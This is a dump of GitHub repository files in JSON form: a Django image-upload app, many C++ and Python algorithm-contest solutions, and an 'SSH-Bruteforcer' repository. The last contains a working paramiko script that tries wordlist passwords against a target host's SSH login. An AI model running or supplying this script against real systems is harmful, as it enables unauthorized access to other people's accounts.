request.FILES['myfile']:\n my_file = request.FILES['myfile']\n fs = FileSystemStorage()\n filename = fs.save(my_file.name, my_file)\n uploaded_file_url = fs.url(filename)\n return render(request, 'upload.html', {\n 'uploaded_file_url': uploaded_file_url\n })\n return render(request, 'upload.html', {'title': 'Upload'})\n\ndef model_form_upload(request):\n if request.method == 'POST':\n form = PhotoForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('home')\n else:\n form = PhotoForm()\n return render(request, 'upload.html', {'form': form})\n" }, { "alpha_fraction": 0.6631578803062439, "alphanum_fraction": 0.6631578803062439, "avg_line_length": 26.285715103149414, "blob_id": "816ada0077fa03fab82d00db2b3c256e88a3ec72", "content_id": "15d75c28c2d45a8a7998fca02bec83dc885e1a3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 60, "num_lines": 7, "path": "/viewer/forms.py", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "from django import forms\nfrom viewer.models import Photo\n\nclass PhotoForm(forms.ModelForm):\n class Meta:\n model = Photo\n fields = ('nickname', 'pet_name', 'img_dir', 'rank')" }, { "alpha_fraction": 0.6836363673210144, "alphanum_fraction": 0.7054545283317566, "avg_line_length": 33.25, "blob_id": "e2180849418d7bb148275851e5ab5371d82d813a", "content_id": "351ca85bf7c732274b75f2a5e08ff8cb126a0cfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 62, "num_lines": 8, "path": "/viewer/models.py", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass Photo(models.Model):\n nickname = models.CharField(max_length=255)\n pet_name = models.CharField(max_length=255)\n img_dir = models.ImageField(upload_to='uploads/%Y/%m/%d/')\n rank = models.FloatField()\n\n" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.7906976938247681, "avg_line_length": 13.333333015441895, "blob_id": "4b1a9c94a7235f9a5f0c9ab2491d137339d6fa06", "content_id": "afdf98eb4cd8fcec16b5df40aec1dde5083a3397", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 43, "license_type": "no_license", "max_line_length": 21, "num_lines": 3, "path": "/requirements.txt", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "Django==3.0.3\nPillow\ndjango-webpack-loader\n" }, { "alpha_fraction": 0.7054263353347778, "alphanum_fraction": 0.7054263353347778, "avg_line_length": 20.66666603088379, "blob_id": "78f218aa01d911b426c45df7c09021e78f50e8be", "content_id": "4d547737fe588c02777d74d5bbce02e78ee53a9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 129, "license_type": "no_license", "max_line_length": 60, "num_lines": 6, "path": "/README.MD", "repo_name": "FelipeLeal/django_images", "src_encoding": "UTF-8", "text": "# Image viewer Django\n\nImage viewer with [Django](https://pypi.org/project/Django/)\n\n## Tools\n* [docker](https://www.docker.com/)" } ]
6
prathamshiwal/SSH-Bruteforcer
https://github.com/prathamshiwal/SSH-Bruteforcer
fe522c941e72b14cb31f6e722258bd40a9d9ed00
45b587977cbb490e1f6c3656a5b245f646fba701
f38d53c6da55636fc91b6045c15b09d1ae602d10
refs/heads/master
2023-04-23T15:12:07.150906
2021-05-16T16:20:22
2021-05-16T16:20:22
367,926,608
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 107.80000305175781, "blob_id": "9de9ed7ecbeee023192cb64f4c5fe78b0540d25c", "content_id": "ce9f6aaf18f507781e1f4a2cf29f9adeab1dcabd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 544, "license_type": "no_license", "max_line_length": 257, "num_lines": 5, "path": "/README.md", "repo_name": "prathamshiwal/SSH-Bruteforcer", "src_encoding": "UTF-8", "text": "# SSH-Bruteforcer\n\nThis is basic SSH bruteforcing tool. There are two scripts which are different in terms of there working speed. the script sshbruteforcer-slow.py works slow and sshbruteforcer.py works fater because it uses threading to attempt passwords on the SSH service.\nThese Scripts require a Taget IP on which the SSH service is running and also needs the name of the user for that particular IP Address.\nA Password file (e.g. basicpassfile.txt, longpassfile.txt) is also needed to bruteforce the SSH service with different passwords.\n" }, { "alpha_fraction": 0.5701133012771606, "alphanum_fraction": 0.5764872431755066, "avg_line_length": 31.06818199157715, "blob_id": "1f4de811f6c8be4127370826769c29fe16d9bd4b", "content_id": "cf780630cf61979b5ed98be12cc1b321175faf6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 143, "num_lines": 44, "path": "/sshbruteforcer-slow.py", "repo_name": "prathamshiwal/SSH-Bruteforcer", "src_encoding": "UTF-8", "text": "import paramiko, sys, os, socket, termcolor\n\n\ndef ssh_connect(password, code=0):\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n try:\n ssh.connect(host, port=22, username=username, password=password)\n except paramiko.AuthenticationException:\n code = 1\n except socket.error as e:\n code = 2\n\n ssh.close()\n return code\n\n\nhost = input(termcolor.colored('[+] Target Address: ', 'blue'))\nusername = input(termcolor.colored('[+] SSH Username: ', 'blue'))\npass_file = input(termcolor.colored('[+] Password File/Path: ', 'blue'))\n\nif os.path.exists(pass_file) == False:\n print(termcolor.colored('[!!] File/Path Does Not Exist.', 'yellow'))\n sys.exit(1)\n\nwith open(pass_file, 'r') as file:\n for line in file.readlines():\n password = line.strip()\n try:\n response = ssh_connect(password)\n \n if response == 0:\n print(termcolor.colored('[+] Found Password: ', 'green') + password + termcolor.colored(' , For Account ', 'green') + username)\n break\n elif response == 1:\n print(termcolor.colored('[-] Incorrect Login: ', 'red') + password)\n else:\n print(termcolor.colored((\"[!!] Can't Connect\"), 'orange'))\n sys.exit(1)\n\n except Exception as e:\n print(e)\n pass\n\n" } ]
2
yegyeom/Algorithm
https://github.com/yegyeom/Algorithm
ae0aef2d0c2275dd6d8ad4d1584c7d7a872e35bb
32e8ac4098b8e541bdf060c29bd673c13bbb8a1f
6fa3663cb3e73ebbbaeff1b984b450fb97f6312e
refs/heads/main
2023-07-01T23:48:38.359556
2022-06-28T09:16:44
2022-06-28T09:16:44
331,221,416
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.316546767950058, "alphanum_fraction": 0.38309353590011597, "avg_line_length": 15.878787994384766, "blob_id": "ebec607c7d6942d5e20b716930ff3a579d112d1a", "content_id": "d9f0651a284c0090b76445a514f762bed3df9824", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 586, "license_type": "no_license", "max_line_length": 58, "num_lines": 33, "path": "/BOJ/Brute Force/1065.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1065번: 한수\n2021-05-18\nBrute Force\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, ans=0;\n cin >> n;\n\n for(int i = 1 ; i <= n ; i++){\n if(i < 100){\n ans++;\n continue;\n }\n else{\n int n1 = i % 10; // 일의 자리\n int n2 = (i / 10) % 10; // 십의 자리\n int n3 = i / 100; // 십의 자리\n\n if(n3 - n2 == n2 - n1){\n ans++;\n }\n }\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4126712381839752, "alphanum_fraction": 0.45034247636795044, "avg_line_length": 15.714285850524902, "blob_id": "08ecc5168ce2c50627601ace02824bbfc361f7a5", "content_id": "3ba80cad7f3a7b88aa95e6c2f225e402be575fcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 598, "license_type": "no_license", "max_line_length": 58, "num_lines": 35, "path": "/BOJ/Greedy/1715.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1715번: 카드 정렬하기\nDATE: 2022-01-30\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n priority_queue<int, vector<int>, greater<int>> pq;\n int n, num, ans = 0;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n pq.push(num);\n }\n\n while(pq.size() > 1) {\n int sum = 0;\n\n for(int i = 0 ; i < 2 ; i++) {\n sum += pq.top();\n pq.pop();\n }\n\n ans += sum;\n pq.push(sum);\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4514435827732086, "alphanum_fraction": 0.4842519760131836, "avg_line_length": 14.895833015441895, "blob_id": "119716bbe1c37e59fd0d4f8523473ab7c3dbd6ad", "content_id": "e51878c919884a0fc3047a84ca6ba98cefca174b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 766, "license_type": "no_license", "max_line_length": 64, "num_lines": 48, "path": "/BOJ/BFS_DFS/15649.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15649번: N과 M (1)\n2022-01-04\nBacktracking\n*/\n#include <iostream>\n#include <vector>\n#define MAX 8\nusing namespace std;\n\nint n, m;\nvector<int> num;\nvector<int> ans; \nbool visited[MAX]; \n\nvoid print(){\n for(int i = 0 ; i < ans.size() ; i++) cout << ans[i] << \" \";\n cout << '\\n';\n}\n\nvoid dfs(int cnt){\n if(cnt == m) {\n print();\n return;\n }\n\n for(int i = 0 ; i < n ; i++){\n if(visited[i]) continue;\n\n ans.push_back(num[i]);\n visited[i] = true;\n\n dfs(cnt + 1);\n \n ans.pop_back();\n visited[i] = false;\n }\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> n >> m;\n\n for(int i = 0 ; i < n ; i++) num.push_back(i + 1);\n dfs(0);\n\n return 0;\n}" }, { "alpha_fraction": 0.3942953050136566, "alphanum_fraction": 0.4194630980491638, "avg_line_length": 24.934782028198242, "blob_id": "a00c127308289c600769e6a188000fa3d3762efb", "content_id": "11a17fbdd07e69a1ce8a11f94c96b6d7c3ee7421", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1232, "license_type": "no_license", "max_line_length": 60, "num_lines": 46, "path": "/programmers/Level 1/number_strings_and_english_words.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 숫자 문자열과 영단어\n//2021 카카오 채용연계형 인턴십\n//2021-09-21\n#include <string>\n#include <vector>\n#include <iostream>\n\nusing namespace std;\n\nint solution(string s) {\n int answer = 0;\n string str;\n \n for(int i = 0 ; i < s.length() ; i++){\n if(!isdigit(s[i])) {\n string tmp;\n \n while(1) {\n if(tmp == \"zero\") {str += \"0\"; break;}\n else if(tmp == \"one\"){ str += \"1\"; break;}\n else if(tmp == \"two\") {str += \"2\"; break;}\n else if(tmp == \"three\") {str += \"3\"; break;}\n else if(tmp == \"four\") {str += \"4\"; break;}\n else if(tmp == \"five\") {str += \"5\"; break;}\n else if(tmp == \"six\") {str += \"6\"; break;}\n else if(tmp == \"seven\") {str += \"7\"; break;}\n else if(tmp == \"eight\") {str += \"8\"; break;}\n else if(tmp == \"nine\") {str += \"9\"; break;}\n tmp += s[i++];\n }\n i--;\n }\n else str += s[i];\n }\n \n answer = stoi(str);\n\n return answer;\n}\n\nint main(){\n int answer = solution(\"2three45sixseven\");\n cout << answer;\n\n return 0;\n}" }, { "alpha_fraction": 0.5038202404975891, "alphanum_fraction": 0.5213482975959778, "avg_line_length": 23.733333587646484, "blob_id": "bce3dc850f11534397611503369057a072ab11b1", "content_id": "5f16e1359a4bf381ca3975cb62593dc8db1559e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2409, "license_type": "no_license", "max_line_length": 79, "num_lines": 90, "path": "/BOJ/Implementation/1713.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 1713번: 후보 추천하기\nDATE: 2021-07-17\n*/\n#include <iostream>\n#include <map>\n#include <vector>\n#include <algorithm>\nusing namespace std;\nmap <int, pair<int, int>> m; //추천받은 학생, (추천 수, 들어온 시기)\n\nbool cmp1(const pair<int,pair<int,int>>& a, const pair<int, pair<int,int>>& b){\n if(a.second.first == b.second.first) return a.first < b.first;\n return a.second.first < b.second.first;\n}\n\nbool cmp2(const pair<int,pair<int,int>>& a, const pair<int, pair<int,int>>& b){\n if(a.second.second == b.second.second) return a.first < b.first;\n return a.second.second < b.second.second;\n}\n\nvoid insert(int student, int n){\n if(m.find(student) != m.end()){ //해당 학생이 이미 존재\n m[student].first++; \n }\n else{ //새로운 학생 삽입\n m[student].first = 1;\n m[student].second = n;\n }\n}\n\nvoid erase(int student, int n){\n if(m.find(student) != m.end()){\n m[student].first++;\n return;\n }\n\n vector<pair<int,pair<int,int>>> vec1(m.begin(), m.end());\n sort(vec1.begin(), vec1.end(), cmp1); //추천 순으로 정렬\n\n int recommend = vec1[0].second.first, cnt=0;\n\n for(auto it : vec1){\n if(it.second.first == recommend) cnt++;\n }\n\n if(cnt == 1){ //추천 횟수 제일 적은 학생 삭제\n m.erase(vec1[0].first);\n } \n else if(cnt > 1){ //추천 수 가장 적은 학생이 두 명 이상\n map<int, pair<int,int>> same_r;\n\n for(auto it : vec1){\n if(recommend == it.second.first){\n same_r[it.first].first = it.second.first; //추천 수\n same_r[it.first].second = it.second.second; //들어온 시기\n }\n }\n\n vector<pair<int,pair<int,int>>> vec2(same_r.begin(), same_r.end());\n sort(vec2.begin(), vec2.end(), cmp2); //들어온 시기 순으로 정렬\n \n m.erase(vec2[0].first);\n }\n \n insert(student, n);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, r, student;\n cin >> n >> r;\n\n for(int i = 0 ; i < r ; i++){\n cin >> student;\n\n if(m.size() < n){ //삽입\n insert(student, i); \n }\n else if(m.size() == n){ //삭제\n erase(student, i);\n }\n }\n\n for(auto it = m.begin() ; it != m.end() ; it++){\n cout << it->first << \" \";\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.43234673142433167, "alphanum_fraction": 0.5010570883750916, "avg_line_length": 23.28205108642578, "blob_id": "34a02e5b7129b0c28878e5b5688f5f45d31ab84e", "content_id": "8a93a5dab894cd00baefdc3fcb1400e7ce2e31b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 954, "license_type": "no_license", "max_line_length": 107, "num_lines": 39, "path": "/programmers/Level 1/mock_test.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 1: 모의고사\n//2021-09-30\n#include <iostream>\n#include <algorithm>\n#include <string>\n#include <vector>\n\nusing namespace std;\n\nvector<int> vec1 = {1, 2, 3, 4, 5}, vec2 = {2, 1, 2, 3, 2, 4, 2, 5}, vec3 = {3, 3, 1, 1, 2, 2, 4, 4, 5, 5};\n\nvector<int> solution(vector<int> answers) {\n vector<int> ans(3), answer;\n int ans1 = 0, ans2 = 0, ans3 = 0;\n \n for(int i = 0 ; i < answers.size() ; i++){\n if(vec1[i % vec1.size()] == answers[i]) ans[0]++;\n if(vec2[i % vec2.size()] == answers[i]) ans[1]++;\n if(vec3[i % vec3.size()] == answers[i]) ans[2]++;\n }\n\n int max_score = max(max(ans[0], ans[1]), ans[2]);\n \n for(int i = 0 ; i < 3 ; i++){\n if(ans[i] == max_score) answer.push_back(i + 1);\n }\n \n return answer;\n}\n\nint main() {\n vector<int> answer = solution({1, 3, 2, 4, 2});\n \n for(int i = 0 ; i < answer.size() ; i++) {\n cout << answer[i];\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.4557739496231079, "alphanum_fraction": 0.48402947187423706, "avg_line_length": 17.11111068725586, "blob_id": "437a0627db97ded88082bfc1c02a81ec5fb7097e", "content_id": "c0cd727ed9a9da0168e6d9fc4a055abcbee9c423", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 836, "license_type": "no_license", "max_line_length": 48, "num_lines": 45, "path": "/programmers/Level 2/k_prime_number.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: k진수에서 소수 개수 구하기\n2022 KAKAO BLIND RECRUITMENT\nDATE: 2022-04-02\n*/\n#include <string>\n#include <vector>\n#include <algorithm>\n#include <math.h>\nusing namespace std;\n\nint answer = 0;\n\nbool isPrime(long long num){\n if(num < 2) return false;\n \n for(long long i = 2 ; i <= sqrt(num) ; i++){\n if(num % i == 0) return false;\n }\n \n return true;\n}\n\nint solution(int n, int k) {\n string str, tmp = \"\";\n \n while(n > 0){\n str += n % k + 48;\n n /= k;\n }\n \n reverse(str.begin(), str.end());\n \n for(int i = 0 ; i < str.length() ; i++){\n if(str[i] == '0' && tmp.length() > 0){\n if(isPrime(stoi(tmp))) answer++;\n tmp = \"\";\n }\n else tmp += str[i];\n }\n \n if(isPrime(stoll(tmp))) answer++;\n \n return answer;\n}" }, { "alpha_fraction": 0.4396551847457886, "alphanum_fraction": 0.4913793206214905, "avg_line_length": 14.5, "blob_id": "87f4fa7eab2ac87b463e11db9d39e807fd23e95d", "content_id": "f4a6b0a89f53317d1cb09fbcd9c4b7bb49aad792", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 470, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/BOJ/Prefix Sum/2559.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2559번: 수열\nDATE: 2022-01-23\nPrefix Sum\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint arr[100001];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n priority_queue<int> pq;\n int n, k;\n \n cin >> n >> k;\n\n for(int i = 1 ; i <= n ; i++) {\n cin >> arr[i];\n arr[i] += arr[i - 1];\n\n if(i < k) continue;\n pq.push(arr[i] - arr[i - k]);\n }\n\n cout << pq.top();\n\n return 0;\n}" }, { "alpha_fraction": 0.5682656764984131, "alphanum_fraction": 0.6125461459159851, "avg_line_length": 19.923076629638672, "blob_id": "564b46a481f9ec394c5c93448434622992d536c3", "content_id": "e6920be339292aa8186baa78a5d32e0c5df3322c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 289, "license_type": "no_license", "max_line_length": 58, "num_lines": 13, "path": "/programmers/Level 1/calculate_the_shortfall.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 1: 부족한 금액 계산하기\ndate: 2022-03-27\n*/\nusing namespace std;\n\nlong long solution(int price, int money, int count)\n{\n long long answer = 0;\n for(int i = 1 ; i <= count ; i++) answer += price * i;\n \n return answer > money ? answer - money : 0;\n}" }, { "alpha_fraction": 0.49501660466194153, "alphanum_fraction": 0.5315614342689514, "avg_line_length": 20.023256301879883, "blob_id": "e44bfec946ae96809c669eacf1867c8422db5882", "content_id": "15c3827bb942147ca017b775b6fa08ee50e84e4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 963, "license_type": "no_license", "max_line_length": 73, "num_lines": 43, "path": "/BOJ/Binary Search/14002.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 14002번: 가장 긴 증가하는 부분 수열 4\nDATE: 2022-01-06\nUPDATE: 2022-02-21\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<int> input, lis, index;\n\nvoid backtrace(int idx, int num){\n if(idx == -1) return;\n if(index[idx] == num){\n backtrace(idx - 1, num - 1);\n cout << input[idx] << \" \";\n }\n else backtrace(idx - 1, num);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, num;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n\n int idx = lower_bound(lis.begin(), lis.end(), num) - lis.begin();\n\n if(lis.empty() || num > lis.back()) lis.push_back(num);\n else lis[idx] = num;\n\n input.push_back(num);\n index.push_back(idx); //i번째 원소가 lis 내에서 위치하는 인덱스를 저장\n }\n \n cout << lis.size() << '\\n';\n backtrace(n - 1, lis.size() - 1); \n\n return 0;\n}" }, { "alpha_fraction": 0.5167464017868042, "alphanum_fraction": 0.5693780183792114, "avg_line_length": 22.33333396911621, "blob_id": "0095d470c6ec86b9769bff40b71603e099faf1e9", "content_id": "9cd3de40cc4270933af463193120dbe6ae8acf7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 215, "license_type": "no_license", "max_line_length": 54, "num_lines": 9, "path": "/programmers/Level 1/kth_number.py", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "# programmers Level 1: K번째수\n# date: 2022-04-14\ndef solution(array, commands):\n answer = []\n \n for i, j, k in commands:\n answer.append(sorted(array[i - 1 : j])[k - 1])\n \n return answer" }, { "alpha_fraction": 0.44225722551345825, "alphanum_fraction": 0.4881889820098877, "avg_line_length": 16.340909957885742, "blob_id": "9fd7b666aafb4dc3918f3bd7ff9f79f6bdc3592c", "content_id": "50ac8d7895d40a8bac935f2126ad34c419585c64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 824, "license_type": "no_license", "max_line_length": 58, "num_lines": 44, "path": "/BOJ/Greedy/13305.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 13305번: 주유소\nDATE: 2021-01-06\n*/\n#include <iostream>\nusing namespace std;\nlong long rate[100001], dst[100000];\n\nint main() {\n\tint check = 0; //계산할 주유소\n\tlong long n, mid_dst, sum_rate = 0;\n\n\tcin >> n;\n\n\tfor (int i = 0; i < n-1; i++) \n\t\tcin >> dst[i];\n\tfor (int i = 0; i < n; i++)\n\t\tcin >> rate[i];\n\n\twhile (1) {\n\t\tmid_dst = 0; //거리 갱신\n\n\t\tfor (int i = check; i < n - 1; i++) { \n\t\t\tif (rate[i] < rate[check]) { //현재 도시보다 가격이 싼 주유소가 있을 때 \n\t\t\t\tfor (int j = check; j < i; j++) \n\t\t\t\t\tmid_dst += dst[j];\n\t\t\t\t\n\t\t\t\tsum_rate += rate[check] * mid_dst;\n\t\t\t\tcheck = i;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse if(i == n-2){\n\t\t\t\tfor (int j = check; j <= i; j++)\n\t\t\t\t\tmid_dst += dst[j];\n\t\t\t\n\t\t\t\tsum_rate += rate[check] * mid_dst;\n\t\t\t\tcout << sum_rate << endl;\n\n\t\t\t\treturn 0;\n\t\t\t}\n\t\t}\n\n\t}\n}" }, { "alpha_fraction": 0.4728132486343384, "alphanum_fraction": 0.513002336025238, "avg_line_length": 15.960000038146973, "blob_id": "75c45da5598a2db0b48e20dacb7e190a13116dbb", "content_id": "fe2e2051c4e3c9bfabe5018f0f2731b89723b0ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 433, "license_type": "no_license", "max_line_length": 59, "num_lines": 25, "path": "/BOJ/Implementation/2075.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2075번: N번째 큰 수\nDATE: 2022-01-30\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n priority_queue<int, vector<int>, greater<int>> pq;\n int n, num;\n cin >> n;\n\n for(int i = 0 ; i < n * n ; i++) {\n cin >> num;\n pq.push(num);\n\n if(pq.size() > n) pq.pop();\n }\n\n cout << pq.top();\n\n return 0;\n}" }, { "alpha_fraction": 0.3746640980243683, "alphanum_fraction": 0.39731284976005554, "avg_line_length": 25.059999465942383, "blob_id": "6f4b1ef6925bf7e8ec59fae81e765a93d2a8ab3e", "content_id": "2f774e6f283c9f1194136c14be3e352463fcf20f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2761, "license_type": "no_license", "max_line_length": 139, "num_lines": 100, "path": "/BOJ/BFS_DFS/3055.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3055번: 탈출\nDATE: 2021-10-12\nBFS\n*/\n#include <iostream>\n#include <queue>\n#include <vector>\nusing namespace std;\n\nint dx[4] = {-1, 0, 1, 0};\nint dy[4] = {0, 1, 0, -1};\nint r, c;\nint d_x, d_y, s_x, s_y;\nvector <pair<int, int>> water;\nqueue<pair<int, int>> s, w;\nchar forest[51][51];\nint s_visited[51][51] = {0, }, w_visited[51][51] = {0, };\n\nvoid bfs() {\n for(int i = 0 ; i < water.size() ; i++) {\n w.push(make_pair(water[i].first, water[i].second));\n w_visited[water[i].first][water[i].second] = 1;\n }\n\n s.push(make_pair(s_x, s_y));\n s_visited[s_x][s_y] = 1;\n\n //종료 조건\n // 1. 고슴도치가 비버의 굴에 도착한 경우 => 거리 출력하고 끝\n // 2. 고슴도치가 더 이상 탐색을 할 수 없는 경우 => KAKTUS 출력하고 끝\n while(!s.empty()) {\n // 물 먼저 이동 (예상 경로)\n int w_size = w.size();\n\n for(int i = 0 ; i < w_size ; i++) {\n pair<int, int> cur = w.front();\n w.pop();\n\n for(int j = 0 ; j < 4 ; j++) {\n int nx = dx[j] + cur.first;\n int ny = dy[j] + cur.second;\n\n if(nx < 0 || ny < 0 || nx >= r || ny >= c || forest[nx][ny] == 'X' || forest[nx][ny] == 'D' || w_visited[nx][ny]) continue;\n w.push(make_pair(nx, ny));\n w_visited[nx][ny] = 1; \n }\n }\n\n //고슴도치 이동\n int s_size = s.size();\n\n for(int i = 0 ; i < s_size ; i++) {\n pair<int, int> cur = s.front();\n s.pop();\n\n for(int j = 0 ; j < 4 ; j++) {\n int nx = dx[j] + cur.first;\n int ny = dy[j] + cur.second;\n\n if(nx < 0 || ny < 0 || nx >= r || ny >= c || forest[nx][ny] == 'X' || w_visited[nx][ny] || s_visited[nx][ny]) continue;\n if(forest[nx][ny] == 'D') { // 목적지 도착\n cout << s_visited[cur.first][cur.second];\n return;\n }\n\n s.push(make_pair(nx, ny));\n s_visited[nx][ny] = s_visited[cur.first][cur.second] + 1; \n }\n }\n }\n\n cout << \"KAKTUS\";\n return;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n cin >> r >> c;\n\n for(int i = 0 ; i < r ; i++) {\n for(int j = 0 ; j < c ; j++) {\n cin >> forest[i][j];\n\n if(forest[i][j] == '*') water.push_back(make_pair(i, j)); // 물\n else if(forest[i][j] == 'D') { // 비버\n d_x = i;\n d_y = j;\n }\n else if(forest[i][j] == 'S') { // 고슴도치\n s_x = i;\n s_y = j;\n }\n }\n }\n\n bfs();\n\n return 0;\n}" }, { "alpha_fraction": 0.40682414174079895, "alphanum_fraction": 0.4593175947666168, "avg_line_length": 18.564102172851562, "blob_id": "efe3bd0bbdc7f8a942a32b71db60f8a13afa5f9a", "content_id": "d6e8ae052d994b2db2db7899e9d241f4a1ef4558", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 770, "license_type": "no_license", "max_line_length": 58, "num_lines": 39, "path": "/BOJ/Dynamic Programming/13398.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "WINDOWS-1256", "text": "/*\nBOJ 13398¹ّ: ؟¬¼ساص 2\nDATE: 2021-07-20 \n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 100001\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int arr[MAX], left[MAX], right[MAX];\n int n, ans;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> arr[i];\n }\n\n ans = left[0] = arr[0];\n right[n - 1] = arr[n - 1];\n\n for(int i = 1 ; i < n ; i++){\n left[i] = max(arr[i], arr[i] + left[i-1]);\n ans = max(ans, left[i]);\n }\n\n for(int i = n - 2 ; i >= 0 ; i--){\n right[i] = max(arr[i], arr[i] + right[i + 1]);\n }\n\n for(int del = 1 ; del < n - 1 ; del++){\n ans = max(ans, left[del - 1] + right[del + 1]); \n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.4465753436088562, "alphanum_fraction": 0.465753436088562, "avg_line_length": 21.4769229888916, "blob_id": "1bc20b7d7b2ea6934968c332034051812f58e736", "content_id": "8eb7197fbb3f1fb6e8329c53fe150122d9815c37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1460, "license_type": "no_license", "max_line_length": 62, "num_lines": 65, "path": "/programmers/Level 3/jewelry_shopping.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 3 : Jewelry shopping\n//2020 KAKAO Internship\n//2021-05-02\n#include <string>\n#include <vector>\n#include <map>\n#include <set>\n#include <algorithm>\n#include <iostream>\nusing namespace std;\n\nvector<int> solution(vector<string> gems) {\n vector<int> answer;\n vector<string> list; \n map<string, int> m;\n set<string> s;\n int n, min=100001, ans_start=0, ans_end=0, start=0, end=0;\n \n list = gems;\n sort(list.begin(), list.end());\n list.erase(unique(list.begin(), list.end()), list.end());\n n = list.size();\n \n while(true){\n if(s.size() == n){\n int dst = end - start;\n \n if(dst < min){\n min = dst;\n ans_start = start + 1;\n ans_end = end;\n }\n \n m[gems[start]]--;\n start++;\n \n if(m[gems[start - 1]] == 0){\n s.erase(gems[start - 1]);\n }\n }\n else if(end == gems.size()){\n break;\n }\n else if(s.size() < 